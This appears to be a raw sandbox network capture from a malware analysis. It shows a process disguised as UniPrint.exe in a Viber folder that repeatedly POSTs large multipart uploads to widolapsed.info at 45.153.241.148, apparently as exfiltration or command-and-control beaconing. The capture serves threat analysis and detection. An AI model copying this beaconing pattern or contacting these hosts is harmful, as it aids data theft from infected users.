Date: Wed, 15 Sep 2021 11:46:15 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=6b11d2c9c96c12b2f73a55eb7b675b9c543bf39010f8901646e662fd86e0db1d; expires=Thu, 15-Sep-2022 11:46:15 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.2.3 | 49806 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:16 UTC | 1501 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76617
Content-Type: multipart/form-data; boundary=--------3156620313
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:16 UTC | 1502 | OUT | Data Ascii:
----------3156620313
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:17 UTC | 1576 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:16 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=3b273b46ce5cf5dc200b46f28ab0ccde5258bf96ac765c838fa97470de9ddd89; expires=Thu, 15-Sep-2022 11:46:17 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49754 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:45:27 UTC | 150 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 81223
Content-Type: multipart/form-data; boundary=--------1733772180
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:45:27 UTC | 150 | OUT | Data Ascii:
----------1733772180
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:45:27 UTC | 230 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:45:27 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=85da168f2b6a531d09ea3d94b29bf46d98da146ecb3a89da44073fedfa538fa0; expires=Thu, 15-Sep-2022 11:45:27 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.2.3 | 49807 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:18 UTC | 1577 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76640
Content-Type: multipart/form-data; boundary=--------2353964795
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:18 UTC | 1577 | OUT | Data Ascii:
----------2353964795
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:20 UTC | 1652 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:18 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=cccd4b3373be03a41cb894397280793c16c6b5037f01659ae4fbb150b2220f5e; expires=Thu, 15-Sep-2022 11:46:18 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
21 | 192.168.2.3 | 49808 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:21 UTC | 1652 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76644
Content-Type: multipart/form-data; boundary=--------2524520363
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:21 UTC | 1653 | OUT | Data Ascii:
----------2524520363
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:22 UTC | 1727 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:21 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=0a1359b7bbe6a79ffa13d42f37651f5ad2e4faae1badc096f3d704d7a9b1f5e9; expires=Thu, 15-Sep-2022 11:46:22 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.2.3 | 49809 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:23 UTC | 1728 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76647
Content-Type: multipart/form-data; boundary=--------776738021
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:23 UTC | 1728 | OUT | Data Ascii:
----------776738021
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:24 UTC | 1803 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:23 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=611eb500e3cd466317a7d1467f6c9f79b81c01c0b4da1e826c2a40a9d27d251e; expires=Thu, 15-Sep-2022 11:46:23 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.2.3 | 49810 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:24 UTC | 1803 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76598
Content-Type: multipart/form-data; boundary=--------1255899435
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:24 UTC | 1804 | OUT | Data Ascii:
----------1255899435
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:25 UTC | 1878 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:24 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=67d0baf06f69b1861a838cdf7628b63d647729694fc1eb6f12b3e2b0802f3ee9; expires=Thu, 15-Sep-2022 11:46:25 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
24 | 192.168.2.3 | 49811 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:26 UTC | 1879 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76639
Content-Type: multipart/form-data; boundary=--------3577760510
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:26 UTC | 1879 | OUT | Data Ascii:
----------3577760510
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:27 UTC | 1954 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:26 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=5eaebc8002b5a3bf935beed88b34a9f53d14ee1f01378b1c6071a165192911fe; expires=Thu, 15-Sep-2022 11:46:26 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
25 | 192.168.2.3 | 49813 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:27 UTC | 1954 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76833
Content-Type: multipart/form-data; boundary=--------4017631281
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:27 UTC | 1955 | OUT | Data Ascii:
----------4017631281
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:28 UTC | 2030 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:27 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=6583dead22c22515029b64a39588f30f5b577db3d99bb62ba98929bd98d2a199; expires=Thu, 15-Sep-2022 11:46:27 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
26 | 192.168.2.3 | 49817 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:29 UTC | 2030 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76635
Content-Type: multipart/form-data; boundary=--------3576073818
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:29 UTC | 2030 | OUT | Data Ascii:
----------3576073818
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:29 UTC | 2105 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:29 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=3bf964a042be270a536051d0f612abbf134cc7dce1ec0c99752dc8740bbcc5de; expires=Thu, 15-Sep-2022 11:46:29 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
27 | 192.168.2.3 | 49818 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:30 UTC | 2105 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76584
Content-Type: multipart/form-data; boundary=--------2060090614
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:30 UTC | 2106 | OUT | Data Ascii:
----------2060090614
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:31 UTC | 2180 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:30 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=644e733c34fda1ac1be1a5f8792b47c5c52e62b9da7ec7efb9e808c0a5708dce; expires=Thu, 15-Sep-2022 11:46:30 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
28 | 192.168.2.3 | 49819 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:31 UTC | 2181 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76670
Content-Type: multipart/form-data; boundary=--------1263745405
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:31 UTC | 2181 | OUT | Data Ascii:
----------1263745405
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:32 UTC | 2256 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:31 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=1943433717168773c3c7d1693b89b6c2cd68d0e8384afe77e8c223cc0b705860; expires=Thu, 15-Sep-2022 11:46:31 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
29 | 192.168.2.3 | 49820 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:32 UTC | 2256 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76644
Content-Type: multipart/form-data; boundary=--------3327901999
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:32 UTC | 2257 | OUT | Data Ascii:
----------3327901999
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:33 UTC | 2332 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:32 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=2faa08828d158c60692f0a51d618251283995aae994b683b354664956d66a7dc; expires=Thu, 15-Sep-2022 11:46:32 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8
2021-09-15 11:46:33 UTC | 2332 | IN | Data Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49755 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:45:28 UTC | 230 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 81262
Content-Type: multipart/form-data; boundary=--------3571177622
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:45:28 UTC | 230 | OUT | Data Ascii:
----------3571177622
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:45:29 UTC | 310 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:45:28 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=43262f698fff9a2fe2aebfa507a36e50eec0556c6974b71976afaec779f20479; expires=Thu, 15-Sep-2022 11:45:28 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8
2021-09-15 11:45:29 UTC | 310 | IN | Data Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
30 | 192.168.2.3 | 49821 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:33 UTC | 2332 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76640
Content-Type: multipart/form-data; boundary=--------1002864139
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:33 UTC | 2332 | OUT | Data Ascii:
----------1002864139
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:34 UTC | 2407 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:33 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=77aa39f3e0133f49e7d84991513818e466532f67e1ab03ff26869534719b41d5; expires=Thu, 15-Sep-2022 11:46:34 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8
2021-09-15 11:46:34 UTC | 2407 | IN | Data Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
31 | 192.168.2.3 | 49822 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:35 UTC | 2407 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76582
Content-Type: multipart/form-data; boundary=--------795614568
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:35 UTC | 2408 | OUT | Data Ascii:
----------795614568
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:35 UTC2482OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 37 39 35 36 31 34 35 36 38 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------795614568--
                                                                                                      2021-09-15 11:46:35 UTC | 2482 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:35 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=72d2c764d55caf667dfeff3581d5b1fa729c64d8bcdddda5db7f4f99dd5879f8; expires=Thu, 15-Sep-2022 11:46:35 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:35 UTC2483INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session ID: 32 | Source IP: 192.168.2.3 | Source Port: 49823 | Destination IP: 45.153.241.148 | Destination Port: 443 | Process: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                                      2021-09-15 11:46:36 UTC | 2483 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76736
                                                                                                      Content-Type: multipart/form-data; boundary=--------572333967
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:36 UTC2483OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 35 37 32 33 33 33 39 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------572333967Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:36 UTC2558OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 35 37 32 33 33 33 39 36 37 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------572333967--
                                                                                                      2021-09-15 11:46:36 UTC | 2558 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:36 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=b1931c04830111111aea6eb3571371f63d3f729b5027d6c58c11874ad7a7a773; expires=Thu, 15-Sep-2022 11:46:36 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:36 UTC2558INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session ID: 33 | Source IP: 192.168.2.3 | Source Port: 49824 | Destination IP: 45.153.241.148 | Destination Port: 443 | Process: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                                      2021-09-15 11:46:38 UTC | 2559 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76592
                                                                                                      Content-Type: multipart/form-data; boundary=--------3756762824
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:38 UTC2559OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 37 35 36 37 36 32 38 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3756762824Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:38 UTC2634OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 37 35 36 37 36 32 38 32 34 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3756762824--
                                                                                                      2021-09-15 11:46:38 UTC | 2634 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:38 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=aa91a2eb5bead98ff02ea94f8df9e3120d4fc8a6fd34c1e07024113508dd1e04; expires=Thu, 15-Sep-2022 11:46:38 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:38 UTC2634INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session ID: 34 | Source IP: 192.168.2.3 | Source Port: 49825 | Destination IP: 45.153.241.148 | Destination Port: 443 | Process: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                                      2021-09-15 11:46:40 UTC | 2634 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76612
                                                                                                      Content-Type: multipart/form-data; boundary=--------4010773262
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:40 UTC2634OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 30 31 30 37 37 33 32 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------4010773262Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
2021-09-15 11:46:42 UTC | 2709 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:40 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=103ccd40d7a4cb1c8b51842a66271d7b87675ab989464d8895780fd21c08c222; expires=Thu, 15-Sep-2022 11:46:40 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
35 | 192.168.2.3 | 49826 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:43 UTC | 2709 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76597
Content-Type: multipart/form-data; boundary=--------1730318477
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:43 UTC | 2710 | OUT | Data Ascii:
----------1730318477
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:44 UTC | 2784 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:43 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=e5f0bc01e65adfb878ebf44a9d0fad746c2406c9782b10156b0abc72510e5b10; expires=Thu, 15-Sep-2022 11:46:43 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
36 | 192.168.2.3 | 49827 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:45 UTC | 2785 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76649
Content-Type: multipart/form-data; boundary=--------2667398164
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:45 UTC | 2785 | OUT | Data Ascii:
----------2667398164
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:45 UTC | 2860 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:45 GMT
